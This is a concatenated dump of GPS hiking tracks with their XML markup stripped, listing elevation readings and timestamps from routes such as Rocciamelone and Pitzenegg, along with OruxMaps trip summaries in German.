+2013.61865234375
+2017-10-18T09:12:37Z
+
+
+2017.4638671875
+2017-10-18T09:13:03Z
+
+
+2077.54638671875
+2017-10-18T09:21:04Z
+
+
+2083.314208984375
+2017-10-18T09:21:44Z
+
+
+2091.966064453125
+2017-10-18T09:23:17Z
+
+
+2096.292236328125
+2017-10-18T09:25:05Z
+
+
+2109.75048828125
+2017-10-18T09:26:25Z
+
+
+2113.115234375
+2017-10-18T09:26:52Z
+
+
+2127.534912109375
+2017-10-18T09:30:11Z
+
+
+2129.938232421875
+2017-10-18T09:33:14Z
+
+
+2152.529052734375
+2017-10-18T09:36:07Z
+
+
+2197.711181640625
+2017-10-18T09:40:52Z
+
+
+2223.186279296875
+2017-10-18T09:45:07Z
+
+
+2230.876708984375
+2017-10-18T09:46:01Z
+
+
+2249.1416015625
+2017-10-18T09:48:22Z
+
+
+2259.235595703125
+2017-10-18T10:49:52Z
+
+
+2270.290771484375
+2017-10-18T10:51:11Z
+
+
+2295.284912109375
+2017-10-18T10:56:19Z
+
+
+2298.6494140625
+2017-10-18T10:56:43Z
+
+
+2327.489013671875
+2017-10-18T10:59:49Z
+
+
+2338.54443359375
+2017-10-18T11:00:57Z
+
+
+2375.07421875
+2017-10-18T11:06:41Z
+
+
+2381.8037109375
+2017-10-18T11:07:29Z
+
+
+2400.54931640625
+2017-10-18T11:09:49Z
+
+
+2449.57666015625
+2017-10-18T11:15:53Z
+
+
+2461.59326171875
+2017-10-18T11:18:30Z
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2016-11-20T16:51:17Z
+
+
+Grün
+
+
+
+
+
+
+1536.28
+1970-01-01T00:00:00Z
+
+
+1521.65
+1970-01-01T00:00:00Z
+
+
+1529.66
+1970-01-01T00:00:00Z
+
+
+1537.48
+1970-01-01T00:00:00Z
+
+
+1529.66
+1970-01-01T00:00:00Z
+
+
+1535.48
+1970-01-01T00:00:00Z
+
+
+1537.79
+1970-01-01T00:00:00Z
+
+
+1541.25
+1970-01-01T00:00:00Z
+
+
+1563.41
+1970-01-01T00:00:00Z
+
+
+1566.54
+1970-01-01T00:00:00Z
+
+
+1583.98
+1970-01-01T00:00:00Z
+
+
+1578.81
+1970-01-01T00:00:00Z
+
+
+1580.49
+1970-01-01T00:00:00Z
+
+
+1592.8
+1970-01-01T00:00:00Z
+
+
+1588.78
+1970-01-01T00:00:00Z
+
+
+1588.76
+1970-01-01T00:00:00Z
+
+
+1599.48
+1970-01-01T00:00:00Z
+
+
+1618.0
+1970-01-01T00:00:00Z
+
+
+1627.06
+1970-01-01T00:00:00Z
+
+
+1625.15
+1970-01-01T00:00:00Z
+
+
+1638.83
+1970-01-01T00:00:00Z
+
+
+1645.26
+1970-01-01T00:00:00Z
+
+
+1648.31
+1970-01-01T00:00:00Z
+
+
+1646.7
+1970-01-01T00:00:00Z
+
+
+1655.4
+1970-01-01T00:00:00Z
+
+
+1638.84
+1970-01-01T00:00:00Z
+
+
+1653.95
+1970-01-01T00:00:00Z
+
+
+1642.12
+1970-01-01T00:00:00Z
+
+
+1642.52
+1970-01-01T00:00:00Z
+
+
+1623.95
+1970-01-01T00:00:00Z
+
+
+1623.82
+1970-01-01T00:00:00Z
+
+
+1603.47
+1970-01-01T00:00:00Z
+
+
+1588.06
+1970-01-01T00:00:00Z
+
+
+1571.04
+1970-01-01T00:00:00Z
+
+
+1568.27
+1970-01-01T00:00:00Z
+
+
+1560.51
+1970-01-01T00:00:00Z
+
+
+1554.15
+1970-01-01T00:00:00Z
+
+
+1513.74
+1970-01-01T00:00:00Z
+
+
+1536.63
+1970-01-01T00:00:00Z
+
+
+1533.5
+1970-01-01T00:00:00Z
+
+
+1520.49
+1970-01-01T00:00:00Z
+
+
+1504.38
+1970-01-01T00:00:00Z
+
+
+1480.02
+1970-01-01T00:00:00Z
+
+
+1483.19
+1970-01-01T00:00:00Z
+
+
+1461.87
+1970-01-01T00:00:00Z
+
+
+1454.75
+1970-01-01T00:00:00Z
+
+
+1443.75
+1970-01-01T00:00:00Z
+
+
+1442.27
+1970-01-01T00:00:00Z
+
+
+1446.11
+1970-01-01T00:00:00Z
+
+
+1459.82
+1970-01-01T00:00:00Z
+
+
+1467.43
+1970-01-01T00:00:00Z
+
+
+1472.47
+1970-01-01T00:00:00Z
+
+
+1485.13
+1970-01-01T00:00:00Z
+
+
+1490.27
+1970-01-01T00:00:00Z
+
+
+1508.38
+1970-01-01T00:00:00Z
+
+
+1506.84
+1970-01-01T00:00:00Z
+
+
+1528.63
+1970-01-01T00:00:00Z
+
+
+1532.87
+1970-01-01T00:00:00Z
+
+
+1527.76
+1970-01-01T00:00:00Z
+
+
+1538.2
+1970-01-01T00:00:00Z
+
+
+1523.53
+1970-01-01T00:00:00Z
+
+
+1529.76
+1970-01-01T00:00:00Z
+ "
+"
+
+
+Rocciamelone
+
+
+
+
+
+OruxMaps
+2015-08-25T04:58:22Z
+
+
+Rocciamelone
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rocciamelone</h2><br /><p>Startzeit: 08/25/2015 06:58</p><p>Zielzeit: 08/25/2015 10:15</p><p>Strecke: 4,5km (03:16)</p><p>Bewegungszeit: 01:55</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 2137m</p><p>Maximale Höhe: 3527m</p><p>Steig-Geschw.: 503,1m/h</p><p>Sink-Geschw.: -358,4m/h</p><p>Aufstieg: 1335m</p><p>Abstieg: -29m</p><p>Steigzeit: 02:39</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2171.28
+2015-08-25T04:58:23Z
+
+
+2169.08
+2015-08-25T04:58:26Z
+
+
+2144.67
+2015-08-25T05:04:18Z
+
+
+2151.22
+2015-08-25T05:05:18Z
+
+
+2165.21
+2015-08-25T05:06:19Z
+
+
+2175.3
+2015-08-25T05:07:01Z
+
+
+2180.0
+2015-08-25T05:08:10Z
+
+
+2201.84
+2015-08-25T05:10:06Z
+
+
+2227.03
+2015-08-25T05:12:07Z
+
+
+2253.26
+2015-08-25T05:14:27Z
+
+
+2276.77
+2015-08-25T05:16:34Z
+
+
+2283.28
+2015-08-25T05:17:21Z
+
+
+2303.89
+2015-08-25T05:18:56Z
+
+
+2318.43
+2015-08-25T05:20:43Z
+
+
+2343.67
+2015-08-25T05:22:38Z
+
+
+2354.97
+2015-08-25T05:23:41Z
+
+
+2371.71
+2015-08-25T05:24:40Z
+
+
+2447.77
+2015-08-25T05:32:39Z
+
+
+2470.3
+2015-08-25T05:34:50Z
+
+
+2482.66
+2015-08-25T05:37:41Z
+
+
+2517.49
+2015-08-25T05:38:34Z
+
+
+2565.38
+2015-08-25T05:44:59Z
+
+
+2572.77
+2015-08-25T05:45:51Z
+
+
+2606.25
+2015-08-25T05:48:48Z
+
+
+2622.89
+2015-08-25T05:50:17Z
+
+
+2633.15
+2015-08-25T05:51:42Z
+
+
+2648.28
+2015-08-25T05:53:16Z
+
+
+2683.29
+2015-08-25T05:56:57Z
+
+
+2702.65
+2015-08-25T05:58:42Z
+
+
+2732.02
+2015-08-25T06:01:38Z
+
+
+2749.27
+2015-08-25T06:03:26Z
+
+
+2763.27
+2015-08-25T06:04:26Z
+
+
+2771.27
+2015-08-25T06:05:57Z
+
+
+2800.89
+2015-08-25T06:08:11Z
+
+
+2804.8
+2015-08-25T06:09:04Z
+
+
+2813.24
+2015-08-25T06:09:46Z
+
+
+2836.65
+2015-08-25T06:11:51Z
+
+
+2906.86
+2015-08-25T06:25:38Z
+
+
+2948.18
+2015-08-25T06:30:32Z
+
+
+3009.3
+2015-08-25T06:38:27Z
+
+
+3024.36
+2015-08-25T06:41:12Z
+
+
+3070.65
+2015-08-25T06:46:14Z
+
+
+3078.4
+2015-08-25T06:47:36Z
+
+
+3113.76
+2015-08-25T06:52:32Z
+
+
+3150.27
+2015-08-25T06:56:36Z
+
+
+3153.02
+2015-08-25T07:13:12Z
+
+
+3183.4
+2015-08-25T07:17:28Z
+
+
+3198.24
+2015-08-25T07:19:17Z
+
+
+3253.9
+2015-08-25T07:25:40Z
+
+
+3259.61
+2015-08-25T07:26:25Z
+
+
+3273.77
+2015-08-25T07:28:15Z
+
+
+3355.3
+2015-08-25T07:42:46Z
+
+
+3419.64
+2015-08-25T07:50:38Z
+
+
+3432.76
+2015-08-25T07:52:38Z
+
+
+3493.77
+2015-08-25T08:02:05Z
+
+
+3515.2
+2015-08-25T08:04:54Z
+
+
+3527.27
+2015-08-25T08:15:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-10T12:02:18Z
+
+2014-08-10 14:02:15
+
+
+
+
+
+
+374.1
+2014-08-10T10:39:06Z
+
+
+369.38
+2014-08-10T10:40:58Z
+
+
+370.52
+2014-08-10T10:41:35Z
+
+
+371.27
+2014-08-10T10:43:24Z
+
+
+373.32
+2014-08-10T10:45:24Z
+
+
+377.55
+2014-08-10T10:46:44Z
+
+
+381.06
+2014-08-10T10:48:22Z
+
+
+385.11
+2014-08-10T10:51:25Z
+
+
+381.63
+2014-08-10T10:53:20Z
+
+
+386.53
+2014-08-10T10:56:22Z
+
+
+382.56
+2014-08-10T10:57:49Z
+
+
+381.96
+2014-08-10T11:02:05Z
+
+
+382.51
+2014-08-10T11:03:33Z
+
+
+384.19
+2014-08-10T11:05:47Z
+
+
+385.23
+2014-08-10T11:07:00Z
+
+
+390.85
+2014-08-10T11:09:48Z
+
+
+392.12
+2014-08-10T11:11:29Z
+
+
+393.3
+2014-08-10T11:14:05Z
+
+
+395.31
+2014-08-10T11:16:46Z
+
+
+396.95
+2014-08-10T11:19:03Z
+
+
+402.48
+2014-08-10T11:22:15Z
+
+
+397.39
+2014-08-10T11:26:18Z
+
+
+394.92
+2014-08-10T11:26:47Z
+
+
+393.93
+2014-08-10T11:28:26Z
+
+
+391.34
+2014-08-10T11:31:50Z
+
+
+390.21
+2014-08-10T11:32:35Z
+
+
+389.89
+2014-08-10T11:33:02Z
+
+
+388.49
+2014-08-10T11:34:26Z
+
+
+383.16
+2014-08-10T11:37:07Z
+
+
+381.9
+2014-08-10T11:38:06Z
+
+
+378.45
+2014-08-10T11:41:05Z
+
+
+378.27
+2014-08-10T11:42:39Z
+
+
+379.52
+2014-08-10T11:43:40Z
+
+
+382.57
+2014-08-10T11:44:31Z
+
+
+376.96
+2014-08-10T11:46:39Z
+
+
+380.46
+2014-08-10T11:49:08Z
+
+
+376.62
+2014-08-10T11:52:20Z
+
+
+374.7
+2014-08-10T11:54:49Z
+
+
+369.53
+2014-08-10T11:56:39Z
+
+
+367.68
+2014-08-10T11:58:24Z
+
+
+366.33
+2014-08-10T12:00:00Z
+
+
+368.3
+2014-08-10T12:02:12Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+2016-02-27_14-00_sa.
+
+
+
+
+2016-02-27_14-00_sa. on GPSies.com
+2016-03-01T20:56:23Z
+
+2016-02-27_14-00_sa. on GPSies.com
+
+
+
+792.08999
+2016-02-27T13:00:11Z
+
+
+759.78999
+2016-02-27T13:05:00Z
+
+
+732.18999
+2016-02-27T13:08:01Z
+
+
+725.48999
+2016-02-27T13:10:01Z
+
+
+710.68999
+2016-02-27T13:14:03Z
+
+
+720.18999
+2016-02-27T13:22:08Z
+
+
+773.18999
+2016-02-27T13:36:05Z
+
+
+789.18999
+2016-02-27T13:37:00Z
+
+
+811.68999
+2016-02-27T13:40:11Z
+
+
+789.28999
+2016-02-27T13:44:00Z
+
+
+782.58999
+2016-02-27T13:45:10Z
+
+
+751.58999
+2016-02-27T13:53:18Z
+
+
+730.98999
+2016-02-27T13:57:40Z
+
+
+707.18999
+2016-02-27T14:02:04Z
+
+
+689.88999
+2016-02-27T14:04:12Z
+
+
+666.78999
+2016-02-27T14:08:07Z
+
+
+649.28999
+2016-02-27T14:10:18Z
+
+
+632.38999
+2016-02-27T14:16:08Z
+
+
+631.08999
+2016-02-27T14:18:00Z
+
+
+626.98999
+2016-02-27T14:19:00Z
+
+
+622.58999
+2016-02-27T14:20:00Z
+
+
+617.98999
+2016-02-27T14:21:15Z
+
+
+595.18999
+2016-02-27T14:23:13Z
+
+
+588.58999
+2016-02-27T14:24:56Z
+
+
+582.38999
+2016-02-27T14:25:28Z
+
+
+567.68999
+2016-02-27T14:28:01Z
+
+
+588.58999
+2016-02-27T14:31:56Z
+
+
+588.38999
+2016-02-27T14:33:22Z
+
+
+589.08999
+2016-02-27T14:34:00Z
+
+
+592.58999
+2016-02-27T14:35:50Z
+
+
+584.38999
+2016-02-27T14:37:43Z
+
+
+575.58999
+2016-02-27T14:38:17Z
+
+
+576.38999
+2016-02-27T14:39:21Z
+
+
+568.68999
+2016-02-27T14:41:00Z
+
+
+558.98999
+2016-02-27T14:42:01Z
+
+
+544.98999
+2016-02-27T14:45:00Z
+
+
+540.88999
+2016-02-27T14:45:00Z
+
+
+527.58999
+2016-02-27T14:47:00Z
+
+
+524.38999
+2016-02-27T14:47:17Z
+
+
+526.38999
+2016-02-27T14:48:00Z
+
+
+534.58999
+2016-02-27T14:48:43Z
+
+
+524.18999
+2016-02-27T14:49:13Z
+
+
+504.38999
+2016-02-27T14:51:01Z
+ "
+"
+
+
+belchenflue
+
+
+849.7773438
+
+867.0234375
+
+892.9726563
+
+896.546875
+
+895.1601563
+
+907.4726563
+
+918.0351563
+
+945.1757813
+
+964.328125
+
+968.328125
+
+965.953125
+
+982.2851563
+
+978.984375
+
+965.5820313
+
+976.5273438
+
+982.7226563
+
+987.671875
+
+996.3242188
+
+955.0820313
+
+992.7851563
+
+994.2929688
+
+1025.9296875
+
+1059.8203125
+
+1052.8554688
+
+1049.0351563
+
+1037.9414063
+
+1040.9296875
+
+933.96875
+
+937.6171875
+
+931.2929688
+
+925.125
+
+923.609375
+
+920.9492188
+
+922.3359375
+
+921.546875
+
+918.8984375
+
+875.6953125
+
+876.46875
+
+878.8984375
+
+871.671875
+
+871.0390625
+
+870.2148438
+
+851.2304688
+
+846.390625
+
+832.1796875
+
+824.0820313
+
+779.0039063
+
+757.5703125
+
+745.3125
+
+728.5195313
+
+706.7421875
+
+705.9257813
+
+703.9960938
+
+702.09375
+
+711.359375
+
+728.015625
+
+744.8046875
+
+756.21875
+
+757.9492188
+
+768.3867188
+
+775.59375
+
+799.7070313
+
+837.1289063
+
+841.75
+
+843.4023438
+
+841.9648438
+
+840.5898438
+
+830.953125
+
+808.4257813
+
+814.9921875
+
+818.53125
+
+824.8554688
+
+828.0039063
+
+832.734375
+
+842.3085938
+
+836.6289063
+
+837.9296875
+
+843.59375
+
+850.359375 "
+"
+
+
+GPSies Track
+
+
+
+
+GPSies Track on GPSies.com
+2016-10-30T23:40:27Z
+
+GPSies Track on GPSies.com
+
+
+
+1114.0
+2010-01-01T00:00:00Z
+
+
+1121.0
+2010-01-01T00:00:15Z
+
+
+1170.0
+2010-01-01T00:01:37Z
+
+
+1228.0
+2010-01-01T00:02:50Z
+
+
+1297.0
+2010-01-01T00:03:49Z
+
+
+1302.0
+2010-01-01T00:03:58Z
+
+
+1329.0
+2010-01-01T00:05:09Z
+
+
+1364.0
+2010-01-01T00:06:15Z
+
+
+1381.0
+2010-01-01T00:06:40Z
+
+
+1406.0
+2010-01-01T00:08:12Z
+
+
+1447.0
+2010-01-01T00:09:19Z
+
+
+1465.0
+2010-01-01T00:09:42Z
+
+
+1464.0
+2010-01-01T00:10:23Z
+
+
+1484.0
+2010-01-01T00:10:40Z
+
+
+1469.0
+2010-01-01T00:11:00Z
+
+
+1475.0
+2010-01-01T00:11:12Z
+
+
+1492.0
+2010-01-01T00:11:29Z
+
+
+1483.0
+2010-01-01T00:11:50Z
+
+
+1511.0
+2010-01-01T00:12:11Z
+
+
+1533.0
+2010-01-01T00:12:35Z
+
+
+1545.0
+2010-01-01T00:12:46Z
+
+
+1547.0
+2010-01-01T00:12:55Z
+
+
+1561.0
+2010-01-01T00:13:05Z
+
+
+1558.0
+2010-01-01T00:13:15Z
+
+
+1582.0
+2010-01-01T00:13:43Z
+
+
+1596.0
+2010-01-01T00:14:08Z
+
+
+1611.0
+2010-01-01T00:14:22Z
+
+
+1650.0
+2010-01-01T00:15:10Z
+
+
+1681.0
+2010-01-01T00:16:12Z
+
+
+1722.0
+2010-01-01T00:17:28Z
+
+
+1726.0
+2010-01-01T00:17:41Z
+
+
+1737.0
+2010-01-01T00:18:03Z
+
+
+1821.0
+2010-01-01T00:20:02Z
+
+
+1854.0
+2010-01-01T00:20:40Z
+
+
+1907.0
+2010-01-01T00:21:34Z
+
+
+1910.0
+2010-01-01T00:21:45Z
+
+
+1923.0
+2010-01-01T00:22:05Z
+
+
+1974.0
+2010-01-01T00:23:04Z
+
+
+2028.0
+2010-01-01T00:23:54Z
+
+
+2061.0
+2010-01-01T00:24:37Z
+
+
+2089.0
+2010-01-01T00:25:36Z
+
+
+2100.0
+2010-01-01T00:26:23Z
+
+
+2115.0
+2010-01-01T00:26:34Z
+
+
+2128.0
+2010-01-01T00:26:55Z
+
+
+2138.0
+2010-01-01T00:27:11Z
+
+
+2153.0
+2010-01-01T00:27:45Z
+
+
+2138.0
+2010-01-01T00:28:19Z
+
+
+2128.0
+2010-01-01T00:28:38Z
+
+
+2116.0
+2010-01-01T00:29:02Z
+
+
+2099.0
+2010-01-01T00:29:15Z
+
+
+2089.0
+2010-01-01T00:30:07Z
+
+
+2061.0
+2010-01-01T00:31:08Z
+
+
+2100.0
+2010-01-01T00:32:01Z
+
+
+2128.0
+2010-01-01T00:32:56Z
+
+
+2093.0
+2010-01-01T00:33:32Z
+
+
+2059.0
+2010-01-01T00:34:23Z
+
+
+2004.0
+2010-01-01T00:35:12Z
+
+
+1949.0
+2010-01-01T00:36:03Z
+
+
+1925.0
+2010-01-01T00:36:43Z
+
+
+1924.0
+2010-01-01T00:36:57Z
+
+
+1932.0
+2010-01-01T00:37:15Z
+
+
+1932.0
+2010-01-01T00:37:54Z
+
+
+1939.0
+2010-01-01T00:38:15Z
+
+
+1952.0
+2010-01-01T00:39:23Z
+
+
+1974.0
+2010-01-01T00:40:18Z
+
+
+1949.0
+2010-01-01T00:40:40Z
+
+
+1934.0
+2010-01-01T00:40:57Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+536.400024414062
+2014-05-05T06:11:53Z
+
+
+535.799987792969
+2014-05-05T06:12:33Z
+
+
+531.799987792969
+2014-05-05T06:13:39Z
+
+
+529.599975585938
+2014-05-05T06:14:35Z
+
+
+539.799987792969
+2014-05-05T06:16:15Z
+
+
+561.400024414062
+2014-05-05T06:17:29Z
+
+
+581.599975585938
+2014-05-05T06:18:37Z
+
+
+602.200012207031
+2014-05-05T06:19:52Z
+
+
+616.799987792969
+2014-05-05T06:20:45Z
+
+
+636.799987792969
+2014-05-05T06:21:56Z
+
+
+645.200012207031
+2014-05-05T06:22:29Z
+
+
+668.400024414062
+2014-05-05T06:23:52Z
+
+
+694.799987792969
+2014-05-05T06:25:36Z
+
+
+714.799987792969
+2014-05-05T06:26:53Z
+
+
+729.200012207031
+2014-05-05T06:27:44Z
+
+
+745.599975585938
+2014-05-05T06:28:47Z
+
+
+771.799987792969
+2014-05-05T06:30:22Z
+
+
+808.0
+2014-05-05T06:33:04Z
+
+
+836.400024414062
+2014-05-05T06:35:58Z
+
+
+888.599975585938
+2014-05-05T06:39:27Z
+
+
+896.200012207031
+2014-05-05T06:39:53Z
+
+
+909.599975585938
+2014-05-05T06:40:43Z
+
+
+930.200012207031
+2014-05-05T06:42:16Z
+
+
+943.200012207031
+2014-05-05T06:43:06Z
+
+
+960.0
+2014-05-05T06:44:26Z
+
+
+970.400024414062
+2014-05-05T06:45:13Z
+
+
+973.400024414062
+2014-05-05T06:46:23Z
+
+
+991.799987792969
+2014-05-05T06:47:38Z
+
+
+1028.0
+2014-05-05T06:50:13Z
+
+
+1040.0
+2014-05-05T06:52:24Z
+
+
+1090.59997558594
+2014-05-05T06:55:39Z
+
+
+1172.40002441406
+2014-05-05T07:01:22Z
+
+
+1198.80004882812
+2014-05-05T07:03:09Z
+
+
+1205.59997558594
+2014-05-05T07:03:39Z
+
+
+1220.19995117188
+2014-05-05T07:04:35Z
+
+
+1228.80004882812
+2014-05-05T07:06:35Z
+
+
+1252.19995117188
+2014-05-05T07:09:04Z
+
+
+1258.19995117188
+2014-05-05T07:09:30Z
+
+
+1351.0
+2014-05-05T07:15:32Z
+
+
+1362.0
+2014-05-05T07:16:14Z
+
+
+1537.0
+2014-05-05T07:28:52Z
+
+
+1531.19995117188
+2014-05-05T07:33:35Z
+
+
+1505.80004882812
+2014-05-05T07:35:45Z
+
+
+1535.19995117188
+2014-05-05T07:39:03Z
+
+
+1530.59997558594
+2014-05-05T07:41:55Z
+
+
+1585.80004882812
+2014-05-05T07:46:55Z
+
+
+1611.80004882812
+2014-05-05T07:49:48Z
+
+
+1655.80004882812
+2014-05-05T07:54:51Z
+
+
+1678.59997558594
+2014-05-05T07:56:18Z
+
+
+1687.40002441406
+2014-05-05T07:57:26Z
+
+
+1679.59997558594
+2014-05-05T07:58:37Z
+
+
+1661.59997558594
+2014-05-05T07:59:59Z
+
+
+1682.59997558594
+2014-05-05T08:02:28Z
+
+
+1725.40002441406
+2014-05-05T08:05:17Z
+
+
+1729.59997558594
+2014-05-05T08:05:55Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-02-05T13:54:07Z
+
+
+Moltinden-696m 001
+
+
+
+
+
+
+34.30859375
+2012-07-09T10:28:34Z
+
+
+83.03515625
+2012-07-09T10:33:08Z
+
+
+124.76171875
+2012-07-09T10:36:27Z
+
+
+183.796875
+2012-07-09T10:40:54Z
+
+
+197.4375
+2012-07-09T10:42:04Z
+
+
+219.3125
+2012-07-09T10:47:42Z
+
+
+207.0078125
+2012-07-09T10:49:47Z
+
+
+237.41015625
+2012-07-09T10:55:04Z
+
+
+251.98828125
+2012-07-09T10:56:22Z
+
+
+261.35546875
+2012-07-09T10:57:14Z
+
+
+270.83203125
+2012-07-09T10:58:40Z
+
+
+266.55859375
+2012-07-09T11:01:56Z
+
+
+283.80859375
+2012-07-09T11:02:50Z
+
+
+305.26953125
+2012-07-09T11:04:39Z
+
+
+320.03125
+2012-07-09T11:06:10Z
+
+
+323.91015625
+2012-07-09T11:09:26Z
+
+
+330.64453125
+2012-07-09T11:10:11Z
+
+
+354.8828125
+2012-07-09T11:12:24Z
+
+
+381.26953125
+2012-07-09T11:14:27Z
+
+
+385.03515625
+2012-07-09T11:15:12Z
+
+
+377.4765625
+2012-07-09T11:43:33Z
+
+
+387.59765625
+2012-07-09T11:46:57Z
+
+
+415.28125
+2012-07-09T11:49:59Z
+
+
+438.703125
+2012-07-09T11:51:00Z
+
+
+424.484375
+2012-07-09T11:52:46Z
+
+
+477.17578125
+2012-07-09T11:55:07Z
+
+
+481.1171875
+2012-07-09T11:56:28Z
+
+
+527.36328125
+2012-07-09T11:59:45Z
+
+
+581.3359375
+2012-07-09T12:04:51Z
+
+
+605.3046875
+2012-07-09T12:07:05Z
+
+
+624.39453125
+2012-07-09T12:09:08Z
+
+
+641.94140625
+2012-07-09T12:11:50Z
+
+
+674.625
+2012-07-09T12:22:25Z
+
+
+657.7890625
+2012-07-09T12:31:24Z
+
+
+673.15234375
+2012-07-09T12:43:03Z
+
+
+639.79296875
+2012-07-09T12:44:55Z
+
+
+630.33984375
+2012-07-09T12:45:59Z
+
+
+601.9609375
+2012-07-09T12:56:10Z
+
+
+588.30859375
+2012-07-09T12:58:25Z
+
+
+519.67578125
+2012-07-09T13:02:48Z
+
+
+477.87109375
+2012-07-09T13:07:01Z
+
+
+424.46484375
+2012-07-09T13:09:07Z
+
+
+430.58984375
+2012-07-09T13:10:43Z
+
+
+367.5
+2012-07-09T13:16:11Z
+
+
+331.65234375
+2012-07-09T13:18:36Z
+
+
+320.72265625
+2012-07-09T13:19:26Z
+
+
+289.734375
+2012-07-09T13:21:05Z
+
+
+267.765625
+2012-07-09T13:26:45Z
+
+
+258.64453125
+2012-07-09T13:27:39Z
+
+
+253.0625
+2012-07-09T13:28:01Z
+
+
+222.08984375
+2012-07-09T13:30:17Z
+
+
+218.6875
+2012-07-09T13:30:57Z
+
+
+200.23828125
+2012-07-09T13:32:38Z
+
+
+185.4609375
+2012-07-09T13:33:22Z
+
+
+171.48828125
+2012-07-09T13:33:45Z
+
+
+117.6328125
+2012-07-09T13:36:38Z
+
+
+76.87890625
+2012-07-09T13:38:30Z
+
+
+50.91015625
+2012-07-09T13:39:24Z
+
+
+40.6484375
+2012-07-09T13:40:20Z
+
+
+14.7734375
+2012-07-09T13:41:44Z
+
+
+2.93359375
+2012-07-09T13:47:07Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-11-01T14:54:32Z
+
+2014-11-01 15:54:30
+
+
+
+
+
+1454.13
+2014-11-01T08:30:58Z
+
+
+1460.86
+2014-11-01T08:31:53Z
+
+
+1477.68
+2014-11-01T08:33:11Z
+
+
+1480.09
+2014-11-01T08:33:34Z
+
+
+1481.05
+2014-11-01T08:35:08Z
+
+
+1513.25
+2014-11-01T08:39:09Z
+
+
+1520.46
+2014-11-01T08:39:49Z
+
+
+1532.96
+2014-11-01T08:40:45Z
+
+
+1552.67
+2014-11-01T08:43:33Z
+
+
+1594.96
+2014-11-01T08:46:53Z
+
+
+1603.14
+2014-11-01T08:47:47Z
+
+
+1640.15
+2014-11-01T08:50:51Z
+
+
+1646.4
+2014-11-01T08:51:46Z
+
+
+1669.47
+2014-11-01T08:54:13Z
+
+
+1677.64
+2014-11-01T08:55:21Z
+
+
+1822.8
+2014-11-01T10:17:27Z
+
+
+1840.58
+2014-11-01T10:20:40Z
+
+
+1825.2
+2014-11-01T10:30:20Z
+
+
+1828.56
+2014-11-01T10:39:14Z
+
+
+1834.33
+2014-11-01T10:50:56Z
+
+
+1852.6
+2014-11-01T11:00:15Z
+
+
+1879.03
+2014-11-01T11:02:14Z
+
+
+1907.87
+2014-11-01T11:41:04Z
+
+
+1924.22
+2014-11-01T11:47:20Z
+
+
+1918.45
+2014-11-01T11:50:07Z
+
+
+1921.33
+2014-11-01T11:58:18Z
+
+
+1919.41
+2014-11-01T12:12:17Z
+
+
+1921.33
+2014-11-01T12:15:17Z
+
+
+1932.39
+2014-11-01T12:41:30Z
+
+
+1959.3
+2014-11-01T13:31:33Z
+
+
+1966.99
+2014-11-01T13:32:41Z
+
+
+1980.93
+2014-11-01T13:36:13Z
+
+
+1974.69
+2014-11-01T13:38:26Z
+
+
+1967.48
+2014-11-01T13:39:21Z
+
+
+1947.29
+2014-11-01T13:41:42Z
+
+
+1943.92
+2014-11-01T13:43:12Z
+
+
+1944.4
+2014-11-01T13:47:24Z
+
+
+1945.36
+2014-11-01T13:51:53Z
+
+
+1958.34
+2014-11-01T13:53:09Z
+
+
+1954.98
+2014-11-01T13:54:24Z
+
+
+1971.8
+2014-11-01T13:56:03Z
+
+
+1981.41
+2014-11-01T13:57:09Z
+
+
+2000.16
+2014-11-01T13:59:02Z
+
+
+1997.28
+2014-11-01T14:08:05Z
+
+
+2042.94
+2014-11-01T14:13:51Z
+
+
+2041.98
+2014-11-01T14:15:24Z
+
+
+2065.05
+2014-11-01T14:19:59Z
+
+
+2085.24
+2014-11-01T14:23:02Z
+
+
+2089.56
+2014-11-01T14:24:50Z
+
+
+2095.81
+2014-11-01T14:26:14Z
+
+
+2117.92
+2014-11-01T14:29:33Z
+
+
+2120.32
+2014-11-01T14:31:03Z
+
+
+2124.17
+2014-11-01T14:31:50Z
+
+
+2119.84
+2014-11-01T14:45:54Z
+
+
+2117.44
+2014-11-01T14:46:31Z
+
+
+2094.37
+2014-11-01T14:48:45Z
+
+
+2074.18
+2014-11-01T14:50:06Z
+
+
+2073.7
+2014-11-01T14:50:29Z
+
+
+2070.82
+2014-11-01T14:51:38Z
+ "
+"
+
+
+pitzenegg
+
+
+
+
+
+OruxMaps
+2015-07-30T10:40:35Z
+
+
+pitzenegg
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pitzenegg</h2><br /><p>Startzeit: 07/30/2015 12:40</p><p>Zielzeit: 07/30/2015 15:42</p><p>Strecke: 4,1km (03:01)</p><p>Bewegungszeit: 01:12</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 5,2km/h</p><p>Minimale Höhe: 1108m</p><p>Maximale Höhe: 2180m</p><p>Steig-Geschw.: 377,6m/h</p><p>Sink-Geschw.: -239m/h</p><p>Aufstieg: 1086m</p><p>Abstieg: -27m</p><p>Steigzeit: 02:52</p><p>Sinkzeit: 00:06</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1118.64
+2015-07-30T10:40:37Z
+
+
+1112.82
+2015-07-30T10:42:52Z
+
+
+1110.96
+2015-07-30T10:43:39Z
